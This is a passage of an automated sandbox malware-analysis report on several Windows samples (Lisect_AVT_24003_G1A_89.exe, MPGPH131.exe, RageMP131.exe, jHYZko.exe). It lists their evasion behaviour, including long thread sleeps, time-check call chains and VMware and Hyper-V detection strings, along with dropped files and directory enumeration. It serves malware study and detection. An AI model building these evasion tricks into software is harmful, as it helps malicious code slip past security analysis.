            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeStalling execution: Execution stalls by calling Sleepgraph_7-22918
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeWindow / User API: threadDelayed 966Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeWindow / User API: threadDelayed 3740Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeWindow / User API: threadDelayed 1341Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeWindow / User API: threadDelayed 2105Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 4125Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 4041Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 4028Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 4134Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 5226Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 2510Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-22922
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1054
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_7-22989
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeAPI coverage: 9.7 %
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5804Thread sleep count: 966 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480Thread sleep count: 3740 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480Thread sleep time: -3740000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5340Thread sleep count: 1341 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5340Thread sleep time: -1341000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5804Thread sleep count: 234 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 4068Thread sleep count: 251 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480Thread sleep count: 2105 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480Thread sleep time: -2105000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1408Thread sleep count: 4125 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1408Thread sleep time: -4125000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4432Thread sleep count: 92 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1372Thread sleep count: 4041 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1372Thread sleep time: -4041000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4432Thread sleep count: 233 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3812Thread sleep count: 235 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 616Thread sleep count: 4028 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 616Thread sleep time: -4028000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3624Thread sleep count: 90 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2556Thread sleep count: 4134 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2556Thread sleep time: -4134000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3624Thread sleep count: 234 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3660Thread sleep count: 235 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2452Thread sleep count: 344 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6096Thread sleep count: 5226 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6096Thread sleep time: -5226000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2604Thread sleep count: 2510 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2604Thread sleep time: -2510000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2452Thread sleep count: 273 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5612Thread sleep count: 267 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E61718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E61754h1_2_00E61718
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108B3B5 recv,FindFirstFileExW,GetLastError,0_2_0108B3B5
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01898D7B FindFirstFileA,0_2_01898D7B
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_0108B41B
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E629E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00E629E2
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0064B3B5 recv,FindFirstFileExW,GetLastError,7_2_0064B3B5
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,7_2_0064B41B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0064B3B5 recv,FindFirstFileExW,GetLastError,8_2_0064B3B5
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,8_2_0064B41B
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E62B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00E62B8C
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Essential Server Solutions without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
            Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2c
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
            Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}l\
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Microsoft Hyper-V Server
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.1.drBinary or memory string: vmci.sys
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: vmware
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
            Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
            Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V (core)
